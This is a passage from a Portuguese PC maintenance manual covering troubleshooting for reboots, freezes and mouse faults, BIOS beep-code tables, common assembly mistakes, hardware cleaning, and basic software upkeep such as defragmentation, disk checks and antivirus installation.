pessoas não leem o que está escrito na mensagem e simplesmente
clicam em OK.

O reinício do computador também pode ser causado por algum vírus.


Tenha certeza de ter um software anti vírus instalado e atualizado e
mande-o fazer uma varredura no sistema. Faça uma varredura com
um anti spyware também. Mais detalhes podem ser encontrados na
seção 6.5

Outra causa muito comum é a fonte do computador que pode estar


ruim. Faça um teste com alguma outra fonte para ter certeza.

Uma parte da memória pode estar com problemas. Como é só uma


parte, o problema pode não ser detectado na hora do boot, como
descrito na seção 4.2.1. Tente limpar a memória como citado anteri-

441
ormente. Caso não resolva, podemos testar a memória usando um
programa chamado Memtest. Baixe as versões mais recentes no site
www.memtest.org. Ele deve ser gravado em um CD virgem. Agora,
reinicie o computador e dê boot pelo CD. Espere o programa terminar
a checagem da memória. Caso dê algum erro, será necessária a
troca da memória. Pegue emprestada a memória de um outro compu-
tador para ter certeza de que este é o problema.

Outra causa é o superaquecimento do processador. Para que ele não


queime, a placa mãe desliga o computador quando detecta que a
temperatura do processador está muito alta. Aguarde uns minutos e
ligue o computador com o gabinete aberto. Se você notar que o coo-
ler não está girando muito rápido, tente lubrificá-lo como descrito na
seção 5.9 . Você pode verificar a temperatura do processador usando
o software HWinfo32 para sistemas de 32-bits e HWinfo64 para sis-
temas de 64-bits.

Outra forma de prevenir o superaquecimento é a escolha correta do


gabinete. É recomendável ter um gabinete de no mínimo 4 baias.
Baia é o espaço reservado para se colocar uma unidade de CD/DVD.

Alguns gabinetes com 3 baias podem dificultar a refrigeração do pro-


cessador. A Figura 4.1
Mostra um computador com apenas 3 baias. Note que a fonte ficará
sobre o cooler do processador quando ela for colocado para dentro
do gabinete, impedindo que o cooler resfrie bem o processador. Já na
Figura 4.2 que mostra um gabinete de 4 baias, nota-se que a posição
da fonte possibilita uma melhor refrigeração do processador.

Figura 4.1: Gabinete de 3 baias com fonte dificultando a refrigeração.

442
Figura 4.2: Gabinete de 4 baias.

4.4 O mouse não funciona

Talvez o cabo de seu mouse tenha se desconectado ou algo no sof-


tware tenha travado o mouse. Se o mouse tiver conexão usb (a mes-
ma conexão usado por pen drives), desconecte e conecte novamente
o mouse para ver se o computador o reconhece.

Mas, se a conexão do mouse for ps/2 (aquela redondinha) ou se o


procedimento anterior falhar, a melhor coisa a fazer é fechar todos os
programas que você esteja trabalhando usando o teclado e com o
computador desligado, recolocar o mouse. Para fazer isso, mantenha
a tecla “ALT” pressionada e pressione a tecla “F4”. Esse atalho fecha-
rá o programa atual. Repita a operação para todos os programas. Se
algum programa estiver minimizado, abra-o com o atalho
“ALT”+“TAB” e depois feche-o com o comando anterior.

Fechados todos os programas, desligue o Windows. Para tanto, pres-


sione a tecla “Windows” (às vezes chamada de tecla “super”) para
aparecer o “Menu Iniciar” e com a seta para baixo, escolha a opção
“Desligar”.

Quando o computador estiver desligado, tire o coloque o mouse no-


vamente e ligue o computador.

Caso o problema persista, tente colocar o mouse em um outro com-


putador para ver se o problema é com ele mesmo. Lembre-se que se
o mouse tiver conexão PS/2, deverá ser colocado com o computador
desligado.

443
4.5 O computador travou

Primeiro, temos que ter certeza que o computador travou. Aperte a


tecla “Num Lock”. Se a sua tecla tiver um led verde, ele deve acender
e apagar quando você aperta seguidamente. Se luz acende e apaga,
seu computador apenas “parou para pensar”, dê um tempo e espere
ele voltar. Se isso não acontecer ou se o led do “Num Lock” não
acender e apagar, é porque seu computador realmente travou.

Agora, o jeito é reiniciar o computador pressionando o botão reset no


gabinete. Faça isso como última opção, após ter esperado um tempo
para que o computador volte a funcionar. O reinício do computador
por esse método acarreta perda de dados não salvos e talvez algu-
mas inconsistências no disco.

4.6 Código de bips da BIOS

Após o POST não detectar quaisquer problemas, o sistema emitirá


um bip curto que o informará que o teste está completo e o computa-
dor carregará o Sistema Operacional normalmente.

Se durante os testes o POST detectar algum problema, ele normal-


mente mostrará o erro na tela. Entretanto, se o problema é detectado
antes da BIOS inicializar uma placa de vídeo, ou a placa de vídeo não
estiver presente (solta por exemplo), a BIOS irá emitir vários sons
para indicar a existência de um problema.

Na lista abaixo temos alguns padrões para as versões de BIOS mais


comuns. É muito importante que você preste atenção ao número e/ou
padrões de bips que seu computador emite durante sua inicialização,
para sua equipe técnica poder auxiliá-lo melhor.

As listas dos códigos de bips para as BIOS AMI e Award são mostra-
das a seguir:

AMI (American Megatrends International)

A BIOS AM

444
I usa os bips numa mesma frequência de tom. Um erro é mostrado
através de um quantidade de bips.

CÓDIGO DO CAUSAS POSSÍVEIS


BIP
1 Bip curto Sistema normal, sem erros
1 Bip longo Falha no Refresh. Falha na placa mãe ou na me-
mória(mais provável)
2 Bips curtos Falha geral. O BIOS não foi capaz de identificar o
problema. Pode ser memória
2 Bips longos Erro de paridade na memória. Memória com Pro-
blema
3 Bips longos Falha nos primeiros 64 KB da memória RAM. Me-
mória com Problema
4 Bips longos Placa-Mãe com Problema (mais provável) ou me-
mória (menos provável)
5 Bips Processador com problema
6 Bips CPU ou Placa-Mãe com problema
7 Bips Processador com problema
8 Bips Placa de vídeo ou memória com problema
9 Bips BIOS com problema
10 Bips Placa mãe com problema
11 Bips CPU ou Placa mãe com problema

Award

A BIOS Award usa bips de durações variáveis. Um bip longo vai tipi-
camente durar 2 segundos, enquanto um bip curto dura 1 segundo.
Também usa diferentes frequências para indicar erros críticos ou
graves.

Se a BIOS Award detectar que a CPU está esquentando acima do


limite, ele irá bipar repetidamente enquanto o computador estiver
ligado.

CÓDIGO DO BIP CAUSAS POSSÍVEIS


1 Bip curto Sistema normal, sem erros
1 Longo, 2 Curtos Placa Vídeo com Problema

445
Bips Repetidos(sem fim) Memória com Problema ou mal contato
1 Longo, 3 Curtos Vídeo ou memória de vídeo com Pro-
blema
Bips de Alta Frequência Falha na ventoinha da CPU
Bips repetidos, Altos e CPU com Problema
Baixos

4.7 Erros comuns na montagem de computador

Aqui são listados alguns erros comuns na montagem do computador.


Alguns erros apontados podem não fazer o computador parar de fun-
cionar, mas ele poderá ter um desempenho abaixo do esperado.

4.7.1 Placa mãe

A maioria das placas-mãe vem de fábrica com uma espuma antiestá-


tica (normalmente rosa, branca ou preta) em sua embalagem. Muitos
técnicos, ao montar a placa-mãe no gabinete, prendem essa espuma
entre a placa-mãe e o chassi metálico do gabinete, pensando que
esse procedimento evita que a placa-mãe encoste no chassi metálico
do gabinete. Acontece que essa espuma retém o calor gerado pela
placa-mãe e evita a normal circulação de ar que há no espaço exis-
tente entre a placa mãe e o chassi metálico do gabinete. Com isso, é
muito comum que micros montados usando essa espuma travem
e/ou deem erros aleatórios por superaquecimento.

4.7.2 Disco rígido e CD ROM

Se você ainda usa um disco rígido IDE (ou seja, ATA-100, ATA-133,
etc) em vez de um disco Serial ATA (SATA), você deve tomar muito
cuidado na hora de instalar o disco. Discos rígidos IDE utilizam um
flat cable de 40 ou 80 vias que normalmente possui três conectores,
um em cada ponta do cabo e um no meio. O disco rígido deve ser
conectado em uma das extremidades do cabo e a placa-mãe, na
outra.

O conector do meio fica normalmente vazio. Acontece que alguns


técnicos instalam o disco rígido no conector do meio do cabo, fazen-
do que o conector da ponta fique “sobrando”. Isso não é bom, pois

446
esse pedaço do cabo irá funcionar como uma antena, captando e
injetando ruídos na transmissão de dados, fazendo com que a taxa
de transferência do disco rígido seja menor. Além disso, se o seu
disco rígido usa um flat cable de 40 vias, recomendamos que você o
substitua por um modelo de 80 vias.

Outro erro é colocar o HD e o CD ROM no mesmo conector IDE. Isso


faz com que a taxa de transferência de dados caia. Se a sua placa
mãe possuir 2 entradas IDE, use uma para o HD e a outra para o CD
ROM. Atualmente, os HDs e até mesmo os drives de CD/DVD possu-
em conexão SATA, assim, esses problemas logo deixarão de apare-
cer.

4.7.3 Memórias

Praticamente todos os micros atuais permitem que a memória RAM


trabalhe no modo chamado “dois canais” ou “dual channel”. Neste
modo de operação, a taxa de transferência da memória é dobrada
(pelo menos teoricamente), já que o processador (no caso dos pro-
cessadores AMD64) ou a ponte norte (no caso dos demais processa-
dores) acessarão à memória a 128 bits por vez, em vez dos tradicio-
nais 64 bits.

Atualmente todos os novos micros trabalham desta forma, exceto


aqueles baseados nos processadores AMD soquete 754 (o Sempron,
por exemplo).

Por isso você precisa verificar se este modo de operação está ou não
habilitado em seu micro de modo a obter o desempenho máximo
possível. Para usar este modo de operação você precisa ter dois ou
um número par de módulos de memória no micro, ou seja, se você
tem apenas um módulo de memória o modo de operação de dois
canais não funcionará. Por isso é melhor ter dois módulos de 1 GB
em vez de apenas um de 2 GB, caso você queria ter 2 GB de memó-
ria instalada em seu micro, por exemplo.

Existem duas maneiras básicas de verificar se o seu micro está ou


não usando o modo de dois canais.

447
A primeira é verificar o que aparece na tela logo após você ligar o
micro. Aparecerá a frase “Single Channel Mode” ou “Dual Channel”.

A segunda maneira é rodar um programa de identificação de hardwa-


re, por exemplo, o HWinfo32. Na aba “memory” estará escrito: “Me-
mory runs at: (single channel) ou (dual channel)”.

Talvez essa informação esteja disponível em placa mãe -> SMIBIOS


DMI-> Memory Device -> Memory Controller. Ele dirá se placa mãe
aceita o padrão dual channel (Supported interleaved: 2 ways) ou sin-
gle channel (Supported interleaved: 1 ways) e se a memória está
rodando em single channel ou dual channel.

Capítulo 5

Manutenção preventiva no hardware

5.1 O que é

É basicamente a limpeza geral das máquinas e checagem dos com-


ponentes. A limpeza das peças e componentes pode chegar a qua-
druplicar o tempo de vida das máquinas. Não é um custo, é investi-
mento!

5.2 Unidade de CD (DVD-ROM,CD-RW)

Use um CD-ROM com superfície em microfibra que ao tocar a super-


fície das lentes da Unidade, faz a limpeza. Somente deve-se usar
uma vez a cada bimestre, pois esse processo é abrasivo. Leia os
manuais explicativos.

5.3 Teclado (Keyboard)

Primeiro vire o teclado de cabeça para baixo, fazendo pequenos mo-


vimentos para cima e para baixo, visando deslocar os resíduos para
fora do teclado.

Após, caso haja alguns resíduos de açúcar ou café, limpe com um


cotonete apropriado embebido em álcool isopropílico .

448
Evite usar aspiradores muito potentes, álcool comum ou água.

5.4 Monitor CRT/Scanner

Não use álcool em hipótese alguma. Limpe o vidro inicialmente com


um pincel fino (o mesmo que é utilizado para passar maquiagem).

Depois passe um pano levemente umedecido em água e depois se-


que-o com outro pano seco. Na parte externa, use pasta apropriada
de limpeza.

Esses procedimentos são abrasivos, portanto devem ser feitos com


moderação.

No caso de monitores de vídeo, lembre-se que mesmo ele sendo


desligado, ainda há energia suficiente para um choque elétrico de
potencia altíssima, portanto evite líquidos em seu interior.

5.5 Monitor LCD

Em monitores LCD, o cuidado é ainda maior. Use apenas um pano


macio e seco para tirar a poeira. O uso de produtos de limpeza na
tela pode danificá-la permanentemente.

5.6 Impressora a Jatos de Tinta

As impressoras da HP e EPSON dispõem de software especial para


alinhamento e limpeza de cartucho.

Na parte externa, use pasta apropriada de limpeza.

Esses procedimentos são abrasivos, portanto devem ser feitos com


moderação. Leia os manuais explicativos e/ou telas de ajuda antes de
executar a tarefa.

5.7 Placa mãe

449
Usando-se um compressor em baixa potencia (apenas um pequeno
sopro às vezes resolve) e um pequeno pincel de cerda, dá-se cabo
dessa tarefa em 5 minutos.

Pode-se usar também um pequeno aspirador em conjunto com o


pincel.

5.8 Placas em geral (Placas conectadas nos slots do computador)

Nesse item incluímos as placas PCI, AGP, ISA e as Memórias.

Primeiro siga o procedimento de limpeza da placa mãe, para evitar


que algum resíduo caia nos slots.

Após isto, retire cada placa, limpando-a levemente na área dos conta-
tos metálicos, usando para isso uma pequena borracha branca e que
não solte fiapos. Após a limpeza recoloque-a no lugar e então passe
para a placa seguinte.

5.9 Coolers

O cooler é fundamental para a refrigeração do processador. Com o


tempo (entre 6 meses e um ano), a lubrificação fica comprometida,
causando a diminuição da rotação e como consequência o aumento
da temperatura.

Como paliativo, retire o Cooler, pulverize WD-40 nos rolamentos e


deixe-o secar. Talvez seja necessário desprender o cooler do dissi-
pador (estrutura de alumínio ou cobre).

Talvez haja também uma etiqueta impedindo o acesso ao rolamento


do cooler e você deverá retirá-la com cuidado.

Após lubrificar o cooler, tenha certeza de que tirou o excesso de óleo


para que este não caia na placa mãe ou no processador.

Importantíssimo:
Ao colocar o cooler velho ou novo no processador, lembre-se de reti-
rar qualquer etiqueta de propaganda que esteja na área de contato

450
com o processador. Não confunda essa etiqueta com etiquetas que
substituem o uso de pasta térmica. Se este não for o seu caso, não
esqueça de colocar uma fina camada de pasta térmica na junção
entre o cooler e o processador e principalmente fazer o FLUXO DE
AR do cooler ir na direção do processador ou seja usá-lo como um
ventilador e não como um exaustor.

Limpe o dissipador com um pincel macio e limpo.

Essas medidas ajudam até mesmo a melhorar o ruído causado pelo


cooler.

5.10 Fonte de Alimentação (power suply)

As fontes contém componentes que também se deterioram no calor e


no uso constante. Por norma, as voltagens podem variar no máximo
até 5% para baixo ou para cima.

Com a deteriorização dos componentes, temos situações onde a


corrente do Hard Disk que é 12 Volts fica em 10Volts, causando per-
da de potencia no motor e acarretando mau funcionando na leitu-
ra/gravação de dados. E isto é muito grave.

A ventoinha da fonte tem que sempre estar limpa, pois ela é usada
como um exaustor do ar quente interno do gabinete do computador.

A limpeza TEM que ser externa, pois a abertura da fonte tem que ser
feita por técnico especializado.

Faça a limpeza com um compressor de ar um pouco mais fraco, o


suficiente para retirar a sujeira de dentro dela.

5.11 Gabinete ou Box do PC

A única limpeza a ser realizada aqui é a retirada do pó com um pano


limpo e seco. Pode-se usar também, em sua parte externa, produtos
especiais para a limpeza de gabinetes.

451
Capítulo 6

Manutenção por Software

As vezes, problemas como a lentidão do computador são soluciona-


dos por uso de softwares, sem a necessidade de troca de peças.

6.1 Desfragmentação de disco

Para tentar diminuir a lentidão do computador, recomenda-se primei-


ramente fazer a desfragmentação do disco. Como o nome já diz, esse
processo tenta acabar com a fragmentação do disco. Mas, o que é
isso?

Quando um arquivo é gravado no disco rígido (HD), o sistema opera-


cional pode optar por gravar esse arquivo no primeiro espaço que
caiba por inteiro. Caso não consiga achar um espaço contínuo para
isso, ou por outras razões, gravará o arquivo em seções descontí-
nuas, fazendo com que a leitura do mesmo demore mais que o nor-
mal, já que o cabeçote de leitura terá que ser deslocado para outras
regiões do HD.

A desfragmentação de disco analisa os aquivos no disco e os move


para partes contínuas.

Para fazer isso no Windows 7, vá em Iniciar -> Todos os Programas->


Acessórios -> Ferramentas do sistema -> desfragmentador de disco.
Escolha a unidade a ser desfragmentada e clique em desfragmentar
disco.

Será mostrado o estado do disco antes e após a desfragmentação.

Você também pode fazer isso abrindo o “Meu Computador”, clicando


com o botão direito do mouse sobre o drive a ser desfragmentado e
escolhendo a opção “propriedades”. Na aba “ferramentas”, clique em
“desfragmentar agora”.

6.2 Corrigindo erros no disco

452
Quando o computador é desligado de forma errada, por exemplo
queda de energia ou reinício pelo botão reset, podem ocorrer algu-
mas inconsistências no disco. Por isso, recomenda-se verificar o dis-
co periodicamente. Para tanto, abra o meu computador, clique com o
botão direito do mouse no drive a ser verificado e escolha a opção
“propriedades”. Vá na aba “ferramentas” e clique em “Verificar Agora”.

6.3 Desinstalação de programas desnecessários

Para desinstalar programas desnecessários, abra o painel de controle


em Iniciar-> Painel de controle.

Clique em “Desinstalar um programa” e desinstale o programa que


você tenha certeza que não é usado.

6.4 Limpeza do registro do Windows

Infelizmente, quando desinstala-se um programa no Windows, vários


registros de configuração ficam para trás, causando perda de perfor-
mance do sistema.

Para solucionar esse problema, o melhor é usar um programa espe-


cializado em excluir entradas inválidas no registro do Windows. Re-
comendamos o CCleaner, um programa gratuito e muito bom. O
CCleaner e o ADWCleaner são os softwares mais seguros para re-
moção de entradas inválidas, sempre preservando a funcionalidade
dos programas e a integridade do sistema como um todo.

6.5 Proteção contra vírus e spywares

Vírus são programas de computadores que fazem algo ruim ao usuá-


rio. Por exemplo, um vírus pode simplesmente abrir janelas com
mensagens engraçadas ou até deletar arquivos importantes. A me-
lhor maneira de prevenir de vírus é a instalação de um antivírus.

Além de um antivírus, recomenda-se a instalação de um anti-


spyware. Spyware são softwares espiões, ou seja, capturam dados
de seu computador e envia para o produtor do Spyware. Esses dados

453
podem ser senhas do e-mail, dados pessoais ou até a senha do ban-
co que você acessa pela internet.

Recomendamos o Avast Antivírus, por ser leve, gratuito, funcional e


ter a opção de ser em idioma português do Brasil. Além disso o pró-
prio Avast inclui detecção de Spyware.

Uma outra dica é a criação de uma conta limitada. Em uma conta


limitada, o usuário não tem permissão de instalar ou desinstalar pro-
gramas. Assim, se um vírus tentar se instalar no sistema não irá con-
seguir. O máximo que poderá fazer é bagunçar a conta do usuário,
mas não será necessário a formatação do disco. Mas atenção, essa
medida não protege o usuário contra vírus, apenas não os deixa to-
mar conta do computador.

454

Você também pode gostar